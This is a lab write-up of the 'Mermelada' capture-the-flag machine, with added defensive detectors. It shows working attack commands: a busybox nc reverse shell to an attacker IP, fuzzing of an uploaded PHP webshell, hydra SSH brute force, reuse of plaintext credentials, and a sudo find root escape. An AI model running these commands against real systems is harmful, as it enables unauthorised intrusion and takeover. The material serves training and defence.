Mermelada

Target machine: https://labs.thehackerslabs.com/machine/164

192.168.100.33

Information gathering

Port scan

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.33                                                       [13:46:36]
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.33:22
Open 192.168.100.33:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 13:53 CST
Initiating ARP Ping Scan at 13:53
Scanning 192.168.100.33 [1 port]
Completed ARP Ping Scan at 13:53, 1.44s elapsed (1 total hosts)
Nmap scan report for 192.168.100.33 [host down, received no-response]
Read data files from: /usr/share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 1.47 seconds
Raw packets sent: 2 (56B) | Rcvd: 0 (0B)

Scanning 80/tcp

root@LAPTOP-O235O5EH [~] ➜  dirsearch -u http://192.168.100.33/                                              [13:53:29]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.100.33/__26-01-21_13-53-52.txt

Target: http://192.168.100.33/

[13:53:52] Starting:
[13:53:54] 403 - 279B - /.ht_wsr.txt
[13:53:54] 403 - 279B - /.htaccess.bak1
[13:53:54] 403 - 279B - /.htaccess.orig
[13:53:54] 403 - 279B - /.htaccess.save
[13:53:54] 403 - 279B - /.htaccess.sample
[13:53:55] 403 - 279B - /.htaccess_orig
[13:53:55] 403 - 279B - /.htaccess_sc
[13:53:55] 403 - 279B - /.htaccess_extra
[13:53:55] 403 - 279B - /.htaccessBAK
[13:53:55] 403 - 279B - /.htaccessOLD2
[13:53:55] 403 - 279B - /.htaccessOLD
[13:53:55] 403 - 279B - /.htm
[13:53:55] 403 - 279B - /.html
[13:53:55] 403 - 279B - /.htpasswds
[13:53:55] 403 - 279B - /.htpasswd_test
[13:53:55] 403 - 279B - /.httr-oauth
[13:53:56] 403 - 279B - /.php
[13:54:12] 200 - 642B - /login.php
[13:54:16] 403 - 279B - /server-status
[13:54:16] 403 - 279B - /server-status/
[13:54:19] 301 - 318B - /uploads -> http://192.168.100.33/uploads/
[13:54:19] 200 - 457B - /uploads/
[13:54:28] 200 - 12KB - /wordpress/
[13:54:33] 200 - 3KB - /wordpress/wp-login.php

Task Completed

There is a WordPress site.

Scan the WordPress site with wpscan.

Inside it there is a file, /2026/01/macoduweklgkmvp-1767607866.7342.php, which displays GIF89a.

This looks like a webshell that uses an image header to bypass the upload filter.
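From the defender's side, a file under wp-content/uploads that starts with an image magic header but also contains a PHP open tag is exactly the polyglot described above. The following scanner is an added example, not code from the lab or from WordPress; it walks an uploads tree, flags any .php file and any image/PHP polyglot, and builds a constructed sample tree in a temp directory to run against.

```python
import os
import re
import tempfile

# Magic bytes of common image formats. A file that begins with one of these but
# also carries a PHP open tag is an image/PHP polyglot like the one found above.
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
PHP_TAG = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)


def classify(data: bytes) -> str:
    """Return 'polyglot', 'php', 'image' or 'other' for a file's raw bytes."""
    is_image = data.startswith(IMAGE_MAGIC)
    has_php = PHP_TAG.search(data) is not None
    if is_image and has_php:
        return "polyglot"
    if has_php:
        return "php"
    return "image" if is_image else "other"


def scan_uploads(root: str):
    """Walk an uploads tree and return (relative path, verdict) for every file
    that has no business being executable there: any .php file, or any image
    whose body also contains PHP code."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                verdict = classify(fh.read(1 << 20))  # header plus tag fit in 1 MiB
            if name.lower().endswith(".php") or verdict == "polyglot":
                findings.append((os.path.relpath(path, root), verdict))
    return sorted(findings)


def demo():
    """Constructed sample uploads tree (not files from the target); returns findings."""
    root = tempfile.mkdtemp()
    d = os.path.join(root, "2026", "01")
    os.makedirs(d)
    samples = {
        "logo.gif": b"GIF89a\x01\x00\x01\x00" + b"\x00" * 16,
        "upload-sample.php": b"GIF89a\n<?php echo 'constructed sample'; ?>",
        "notes.txt": b"plain text, nothing to see",
    }
    for name, body in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(body)
    return scan_uploads(root)
```

Pointing scan_uploads at a real wp-content/uploads directory gives the same report; pairing it with a web server rule that refuses to execute PHP under uploads removes the class of issue entirely.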

fuzz

root@LAPTOP-O235O5EH [~] ➜  wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt -u http://192.168.100.33/wordpress/wp-content/uploads/2026/01/macoduweklgkmvp-1767607866.7342.php\?FUZZ\=id --hc 404,500
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.100.33/wordpress/wp-content/uploads/2026/01/macoduweklgkmvp-1767607866.7342.php?FUZZ=id
Total requests: 4614

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000915: 200 3 L 5 W 68 Ch "cmd"

Total time: 0
Processed Requests: 4614
Filtered Requests: 4613
Requests/sec.: 0

Privilege escalation

www shell

Get a reverse shell.

busybox nc 192.168.100.31 7777 -e /bin/bash

www -> debian

cat /etc/passwd | grep "home"

There are two users; try brute-forcing debian.

hydra -l debian -P /usr/share/wordlists/rockyou.txt 192.168.100.33 ssh -t 4 -vV
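The hydra run above leaves a very recognisable trail in the target's auth.log: a burst of "Failed password" lines for one account from one source. This detector is an added example, not part of the original writeup; the log lines it runs on are constructed in sshd's syslog format, and the year passed to the parser is assumed because syslog timestamps omit it.

```python
import re
from collections import defaultdict
from datetime import datetime

# sshd failure line in classic syslog format (no year in the timestamp).
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)

# Constructed sample log, not the target's real auth.log: six failures in five
# seconds from one source, a success, and a lone failure from another source.
SAMPLE_LOG = [
    f"Jan 21 13:55:{s:02d} debian sshd[{1200 + s}]: Failed password for debian "
    f"from 192.168.100.31 port {50100 + s} ssh2"
    for s in range(6)
] + [
    "Jan 21 13:55:06 debian sshd[1206]: Accepted password for debian from 192.168.100.31 port 50106 ssh2",
    "Jan 21 14:10:00 debian sshd[1300]: Failed password for debian from 192.168.100.40 port 41000 ssh2",
]


def parse_ts(ts: str, year: int = 2026) -> datetime:
    # Syslog omits the year; the assumed year only matters across a year boundary.
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return {(ip, user): total_failures} for every source that produced at
    least `threshold` failed passwords for one account within `window_s` seconds."""
    attempts = defaultdict(list)
    for line in lines:
        m = FAILED.match(line.rstrip())
        if m:
            attempts[(m["ip"], m["user"])].append(parse_ts(m["ts"]))
    alerts = {}
    for key, stamps in attempts.items():
        stamps.sort()
        start = 0  # sliding window over the sorted timestamps
        for end, t in enumerate(stamps):
            while (t - stamps[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                alerts[key] = len(stamps)
                break
    return alerts


def demo():
    return detect_bruteforce(SAMPLE_LOG)
```

A success that follows the burst (the "Accepted password" line) is the event worth escalating, since it means the guessed password worked.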

debian -> mermeladita

There is a hint in the /opt directory: .credenciales

Database credentials, so look up the WordPress database account and password.

/var/www/html/wordpress/wp-config.php

root:12345

Log in to MySQL

mysql -uroot -p12345

This yields the second user's credentials.

mermeladita:pepitU

mermeladita -> root

su mermeladita

sudo privilege escalation

mermeladita@debian:/var/www/html/wordpress$ sudo -l
Matching Defaults entries for mermeladita on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User mermeladita may run the following commands on debian:
(ALL : ALL) NOPASSWD: /usr/bin/find

The user can run /usr/bin/find as root without a password.

GTFOBins has a ready-made method; just use it.

https://gtfobins.org/gtfobins/find/
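The rule shown by sudo -l above is the root cause: a NOPASSWD grant on a binary that can run arbitrary commands itself. This audit helper is an added example (not part of the writeup or of sudo); it parses sudo -l output, with the page's own output embedded verbatim as sample input, and reports rules that amount to a passwordless root shell. The set of escape-capable binaries is a non-exhaustive assumption of this example.

```python
import re

# Output of `sudo -l` as shown on this page (copied verbatim).
SUDO_L_OUTPUT = r"""Matching Defaults entries for mermeladita on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User mermeladita may run the following commands on debian:
    (ALL : ALL) NOPASSWD: /usr/bin/find
"""

# Binaries whose normal options spawn a subprocess or write arbitrary files, so a
# root rule for them is a root shell in disguise. Non-exhaustive; an assumption of
# this example, with GTFOBins as the reference list.
ESCAPE_CAPABLE = {"find", "vim", "vi", "less", "more", "awk", "perl", "python3", "env"}

RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(output: str):
    """Parse the rule lines that follow 'User ... may run' into dicts."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if m:
            tags = {t.rstrip(":") for t in m["tags"].split()}
            rules.append({"runas": m["runas"].strip(), "tags": tags, "cmd": m["cmd"].strip()})
    return rules


def risky_rules(output: str):
    """Commands that give a passwordless root shell: runs as root/ALL, NOPASSWD,
    and the command is ALL or a binary that can escape to a shell."""
    hits = []
    for r in parse_sudo_l(output):
        binary = r["cmd"].split()[0].rsplit("/", 1)[-1]
        as_root = r["runas"].split(":")[0].strip() in ("ALL", "root")
        if as_root and "NOPASSWD" in r["tags"] and (r["cmd"] == "ALL" or binary in ESCAPE_CAPABLE):
            hits.append(r["cmd"])
    return hits
```

The fix for a hit is to drop the rule or replace it with a wrapper script that takes fixed arguments, since restricting find's arguments in sudoers is not practical.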

mermeladita@debian:/var/www/html/wordpress$ sudo /usr/bin/find . -exec /bin/sh -p \; -quit
# whoami
root
#